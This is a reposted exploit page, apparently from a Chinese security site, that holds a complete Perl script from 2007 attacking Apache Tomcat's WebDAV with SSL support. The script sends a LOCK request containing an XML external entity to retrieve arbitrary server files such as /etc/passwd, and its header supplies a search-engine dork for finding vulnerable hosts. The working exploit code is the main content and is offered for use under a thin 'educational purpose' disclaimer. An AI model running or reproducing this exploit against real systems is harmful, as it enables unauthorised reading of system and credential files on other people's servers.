首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) 来源：http://milw0rm.org/ 作者：h3rcul3s 发布时间：2007-10-22   #!/usr/bin/perl #================================================================ # Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL # MoDiFiEd version by  : h3rcul3s # ORiGiNaL Version by  : kcdarookie aka eliteb0y / 2007  http://milw0rm.org/exploits/4530 # MoDiFiCaTiOn        : This code is useble against targets over SSL # Prerequisites        : A valid login credentials, webdav # DoRk                 : intitle:"Directory Listing For /" + inurl:webdav tomcat # Potential targets    : similar to https://www.somehost.com:8443 #================================================================ # THaNkS To eliteb0y, the whole team AnD "perlmonks". # This piece of code is written ONLY for educational purpose. # Use it at your own risk. # No author will be responsible for any damage. #================================================================ # -------------------------[C O D E]----------------------------- #================================================================ use LWP::Protocol::https; use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE-------------------------------------------- $remoteport = 8443; sub usage {        print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n";        print "\n\n";        print "Basic exploit by      : kcdarookie aka eliteb0y / 2007\n";        print "SSL Support added by  : .o0|h 3 r c u l 3 s|0o. \n";        print "\n\n";        print "USAGE  :\nperl  TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n";        print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit;            } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname, PeerPort => $remoteport,                      Proto    => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n"; print "\n"; print "Launching Remote Exploit over SSL...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) {        print; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·BBPortalS <= 2.0 Remote Blind ·PHP 5.x COM functions safe_mod ·Vanilla <= 1.1.3 Remote Blind ·Mozilla Firefox <= 2.0.0.7 Rem ·SMF 1.1.3 Extremely fast Blind ·DNS Recursion bandwidth amplif ·KNET Webserver <= v1.04c PoC X ·Oracle 10g CTX_DOC.MARKUP SQL ·超星Activex溢出0day ·eIQnetworks ESA SEARCHREPORT R ·Half-Life Server 3.1.1.0 Remot ·Jakarta Slide <= 2.1 RC1 Remot   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved